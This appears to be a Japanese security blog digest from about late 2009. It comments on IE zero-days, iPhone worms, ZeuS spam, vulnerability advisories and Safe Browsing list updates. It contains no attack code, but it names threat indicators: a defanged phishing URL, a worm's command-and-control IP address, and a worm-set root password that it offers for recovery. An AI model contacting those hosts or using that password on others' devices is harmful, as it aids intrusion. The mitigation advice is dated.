This means that IE users can protect their systems by disabling the Active Scripting settings for the internet zone, although as a result, many web pages will no longer function.
Internet Explorer Layout Handling Memory Corruption Vulnerability 指標:4
Disable support for active scripting for all but trusted websites.
IEには NoScriptのように、サイトごとにJavaScriptの許可・不許可の機能が無い（あるいは、信頼するサイトを１こずつ登録）ので、全部切るか脅威を許容するかどちらかしかないということですね。

Internet Explorer Vulnerability Exploit Detected

尚、この件により VUPENが警戒度を上げるように警告しています。
VUPEN Security - Security Threats Watch 24x7

----------
IE8よ、おまえもか

Major IE8 flaw makes 'safe' sites unsafe
Google said
A Google spokesman confirmed there is a "significant flaw" in the IE 8 feature but declined to provide specifics.
“ We're aware of a significant flaw affecting the XSS Filter in IE8, and we've taken steps to help protect our users by disabling the mechanism on our properties until a fix has been released. ”
IE8使ってないのでよくわかりませんが（笑）、IE8のXSSフィルタはブロックするのではなく、脆弱性のあるコードを自動的にre-writeするもので、この部分を悪用した攻撃の可能性が示唆されています。
発見したのがGoogleというのも、いろいろありそうですが・・

----------
Firefoxにも・・

Firefox: Heat and the CPU usage problem
Firefox has a CPU usage issue and, consequently, can cause overheating problems in some laptops, particularly ultraportables. That's what I've found over the last couple of years.
Firefoxが一部のラップトップ機のリソースを喰いすぎて、加熱状態を発生させているという指摘

Firefox consumes a lot of CPU resources

----------
ohshit

下品でごめんなさい・・
Password recovery for the latest iPhone worm
Thanks, however, to John the Ripper, I can tell you that the new password is: 'ohshit'.
新しいiPhone Wormによって、rootのパスワードが書き換えられてしまった方、上述のパスワードを試してみてください（苦笑）

----------
ランチョンミート

Spoofed Trend Micro Email Leads to Phishing Site
hXXp://l.trndmcro.com/rts/{BLOCKED}
うちには来てないので、そんなにメジャーじゃないのでしょうが・・

Phishers Playing Games?
コレ、何のゲームでしょ？（笑）

ZeuS
Zeus' Social Security Statement Spam Campaign
UAB Spam Data Mine finds Social Security Statement Zeus Bot -- GarWarnar
&
Fake Flash Player Zbot spread by "Your Domain" -- GarWarnar
ますます巧妙化、多様化するZeuS攻撃

----------
穴ぼこ

[IN ZERO DAY]
Outreach Project Tool "CRM_path" File Inclusion Vulnerability 指標:4
Outreach Project Tool 最終リリース:2006-09-10

[IN ZERO DAY]
PHP Traverser "GLOBALS[BASE]" File Inclusion Vulnerability 指標:4
PHP Traverser 最終リリース:2004-03-17

----------
DSN-BH

HUGE UPDATE: 4900+ Domains removed
Older domains from 2008, which no longer seem to be associted with malware — over 4900 — have been removed.
(Don’t worry, plenty of new domains will be added in the coming weeks…)

ブラックリストは、追加は楽なんですが、削除の基準とかが大変ですよね。

----------
Google vs (Steve Ballmer & Rupert Murdoch)

Microsoft、マードックと話し合い―本気でBingのためにニュースを札束で買おうとしているのか？
本気（正気）かしらん？
まぁ、お金と権勢を持ってるとこがナリフリ構わない手段に出るとどうなるかはわかりませんが・・・

Murdoch-Microsoft Deal In the Works

----------
| 1259006414 | B | [goog-black-hash 1.45079 update]
| 1259006402 | M | [goog-malware-hash 1.17404 update]
| 376445 |(-1546 : 377961)
| 1036320 |
EoF

勤労感謝の日(Labor Thanksgiving Day)
ハートケアの日(心臓病)
新嘗祭
手袋の日
外食の日
Jリーグの日
いいふみの日
ゲームの日
小ねぎ記念日
珍味の日
Windows 95発売の日

/(スラッシュ)は不評だったのでヤメ
----------
IE6/IE7 getElementsByTagName()

IE6 and IE7 0-Day Reported
Microsoft Internet Explorer CSS Handling Code Execution Vulnerability (0day)
Disable Active Scripting in the Internet and Local intranet security zones.
VUPEN Security is not aware of any vendor-supplied patch.
SANSではまだ確認できてないようですが・・・

とりあえず、IE7が動作する環境の人は IE8に上げましょう。
問題は IE6しか選択肢の無い人(Windows XP SP2以前に固執)ですが・・・少ないメモリで軽快に動作するのは事実なんですよね・・（苦笑）

----------
Another iPhone Worm

Yet Another iPhone Worm?
Unlike the first iPhone worm, this one appears to cover a much broader range of IP addresses, including UPC in the Netherlands, Optus in Australia, possibly a Hungarian and a Portuguese provider, T-Mobile and potentially many others.
Malicious iPhone worm
This one connects to a web-based command & control center running at 92.61.38.16 in Lithuania.
UAB HOSTEX (リトアニア)

iPhoneユーザは、手順に従って root と mobile のデフォルトパスワードの変更を行いましょう。
JailBrokenを入れてしまった人は、工場出荷時の初期設定に戻しましょう。

----------
FeedBurner

どういう経緯でか、Googleに買収されてしまったFeedBurnerですが・・
Google FeedBurner - feedproxy.google.comを利用したリダイレクト
こんな使われ方で本望なんでしょうか？

Feedburnerには運営をきちんとしてもらわなくては困る
これでRSSは完全に死んだ：FeedburnerのCEO、Dick CostoloがTwitterのCOOに

----------
オワタ

「たんすケータイあつめタイ＼(^o^)／」キャンペーンはじまる
たんすケータイあつめタイ＼(^o^)／
＼(＾o＾)／ｵﾜﾀ

RX-8って燃費どうなんですか？・笑

----------
| 1258920047 | B | [goog-black-hash 1.45007 update]
| 1258920003 | M | [goog-malware-hash 1.17380 update]
| 377961 | (378066 - 105)
| 1032549 |
EoF

和歌山県ふるさと誕生日
いい夫婦の日「いい(11)夫婦(22)」by 余暇開発センター
ボタンの日
大工さんの日
長野県りんごの日
回転寿司記念日 (Conveyor belt sushi)

/----------/
はじめてGumblarに感心した

「１日２０分！在宅ワークで毎月４６万円を稼ぐ方法」
なんてキーワードでコメントスパムを書きまくってる会社のサイトがGumblarに陥落していました（苦笑）

いえ・・ただそれだけなんですけどね・・・

/----------/
IE Zero-day?

Zero-Day Internet Explorer Exploit Published
It affects Internet Explorer versions 6 and 7 as well.
In both cases, the attack requires JavaScript to exploit Internet Explorer.

IE7 Nov 20 2009 06:04PM

どこまで影響があるかは今後の調査待ちですが、結局 JavaScriptなんですねぇ・・

/----------/
ChromeOS

Chrome OS - The good, the bad and the ugly, and how it fits in with Windows, Mac and Linux
ugly:
Then there’s the fact that all this stuff is untested. Even with a year to go until we see Chrome OS on hardware, things could go horribly wrong. There’s plenty of scope for bugs, security issues and data loss.
酷評・・
ちなみにウチの環境下ではまだ起動できてません（泣）

/----------/
SEHOP

Structured Exception Handler Overwrite Protection (SEHOP)
Preventing the Exploitation of SEH Overwrites -- 2006.09
構造化例外処理 (SEH)の上書き防止機能は
Windows Vista SP1やWindows Server 2008でデフォルトで有効状態にされましたが、Windows7ではデフォルトでは無効にされています。
しかし、SEHOPを全部のアプリケーションで有効化すると、一部のアプリケーションには障害が発生します。それでも悪意のあるバッファーオーバーラン攻撃からの防護には有効ですので、「自己責任で」すべてのアプリケーションに適用してください。
というアドバイザリが出されました。
SEHOP per-process opt-in support in Windows 7

しかしこれ、各個のアプリケーションが SEHOPに対応してないのかどうかチェックしてレジストリを弄るのは大変じゃありませんか？（苦笑）
※DEPとの違いがいまひとつ判らない・・・

参考：
Windows における例外ハンドリング -- @a4lg の準技術的日記

/----------/
EXPLO.IT

Milw0rm(作者さんがどうなったのかは誰にも判らない・・）の後継サイトになるのかどうかは不明ですが、
Exploits Databaseがドメインを取得・・その名は・・・
EXPLO.IT
※exploit-db.comにリダイレクトされます

/----------/
Vulnerabilities

[IN ZERO DAY]
KDE:
KDE kdelibs Floating Point Number Processing Memory Corruption 指標:4
KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)

[IN ZERO DAY]
Opera:
Opera Floating Point Number Processing Memory Corruption 指標:4
Opera 10.01 Remote Array Overrun (Arbitrary code execution)

/----------/
SQL Server 2005

SQL Server 2005の更新プログラムで 737d エラーが出てしまう時の対処方法 その２
Windows Update を使用して更新プログラムをインストールすると、エラー コード "737D" が表示される

/----------/
またか・・

[Security-announce] VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components

What is making you vulnerable?
Make sure If you do find old vulnerable versions of software to ask your vendor when they might be addressing it.
現実には、こうしたアドバイザリが出て何も対処しないと「怠慢だ」と怒られ、セキュリティアップデートしたいと言うと「止められない」と怒られるんです・・・

じゃ、どうしろと？

/----------/
けろろ？

Hotmail特定ドメイン（keroro.com）の不具合について

Windows Live Hotmailサービスの特定ドメイン（keroro.com）におけるメールアドレス取得時の不具合について
ケロロ軍曹×WindowsLive 一緒に10周年スペシャル企画　アドレスは早い者勝ちでありますよ?♪ (msn.com) において、メールアドレスの多重受付を許してしまう欠陥があり、後から受付をした人は、以前に受付をした人のアカウントを意図せずに完全に乗っ取ってしまった模様。結果として甚大な情報漏洩・プライバシー侵害が発生した恐れがある。

ああぁっ！（苦笑）
また商品券ネタになるのか？

/----------/
Weastern Digital社製HDDに不具合？

最近全くアンテナを張っていなかったのですが、Seagateが堕ち、HGSTは相変わらずの国内無視政策を続ける中、一人がち（もう１社ありましたっけ？・笑）の感があった WD になにやら問題がある模様・・・

WD10EADSがNG? -- NETGEAR ReadyNAS Forum
Netgear社（※Nortel社から完全分離）製の NAS、ReadyNAS特有の問題のような気もしますが、一応・・・

他社のNAS/Raid Controllerでの、「連続した」不具合報告が見つかっていないのでクラスタ分析的には、あまり騒ぐほどでもない気はします。

/----------/
誰かが飛行機に乗ったら１＄キャッシュバック

Fly for $1 or Your Money Back!

だからそんなイイ話は、何かが潜んでいるんです。

/----------/
| 1258815624 | B | [goog-black-hash 1.44920 update]
| 1258815603 | M | [goog-malware-hash 1.17351 update]
| 378066 | (377144 + 922)
| 1026972 |
EoF